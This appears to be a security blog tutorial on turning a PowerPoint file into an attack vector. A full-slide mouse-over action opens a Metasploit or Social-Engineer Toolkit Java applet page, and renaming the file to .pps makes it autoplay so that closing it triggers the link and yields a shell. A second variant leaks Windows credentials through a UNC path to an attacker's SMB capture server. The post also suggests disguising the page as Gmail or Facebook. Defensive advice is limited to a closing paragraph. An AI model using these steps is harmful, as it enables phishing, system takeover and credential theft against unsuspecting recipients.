There have been all kinds of document attacks, but what about PowerPoint. It turns
out that PowerPoint makes it easy for an attacker to turn the innocent
slideshows into a nasty little attack.
The attack involves 4 simple steps, make a slideshow, make an action,
rename the file and distribute it.
First things first, you need to make a slideshow. Design it
anyway you want, pick the slide or slides you want to use the action on. Make a
new text box and drag the box to cover the whole page. Click on insert ->
actions -> mouse over. Then click the hyperlink button and select URL.
Enter the desired URL, click OK and save the PowerPoint. In figure 1 I have entered a URL that is already set up
for the Java Applet attack. This can be done with Metasploit or the SocialEngineering Toolkit.
Figure 1
If we were to send this to a target as is, it would work only
when they started the slide show, in an attempt to circumvent that we can
rename the file from a PPT to a PPS (figures 2,3), which is a PowerPoint
Slideshow. When the file is opened it starts as a full screen slide show. Since
our attack is launched via a mouse over, when the user attempts to close the
document the odds are they will trigger the attack.
Figure 2
Figure 3
At this point our malicious web page is opened, and the Java
Applet attack commences, as seen below.
The user may not even be aware that they triggered the
webpage to open; it might be beneficial to have the page appear to be a common
webpage such as Gmail or Facebook. If the target decides to hit run we would be
given our shell and complete control of the system as shown in figure 5.
Figure 5
I wanted to see if it was possible to embed a UNC path,
turns out it is just as simple. Following the same steps as outlined above but when
you select URL enter a UNC path such as \\ipaddress\a.gif
and set Metasploit to use the auxiliary/server/capture/smb module for
capturing your requests. As you can see from figure 6 each time the mouse
passes over the target area it sends the credentials. Now all you have to do is
crack them.
Figure 6
These attacks are not new, the important part is that
PowerPoint does not warn the user. There is no popup asking the user if
they want to visit the site and more importantly there is absolutely no warning
of the attempted authentication attempt. The user may not even know that they
have fallen victim to this attack.
This attack is very difficult to detect, as this is simply
using the features of PowerPoint for a malicious purpose. If this type of attack
originated from a trusted individual spoofed or even a disgruntled employee it
could be absolutely devastating. My advice is simple; make sure you know the
sender. There is nothing wrong with making a phone call and saying “Did you
send me this PowerPoint.” Also, if you notice any odd behavior after using a
PowerPoint it may warrant further investigation.
Special thanks to my wife and @_Jagar_
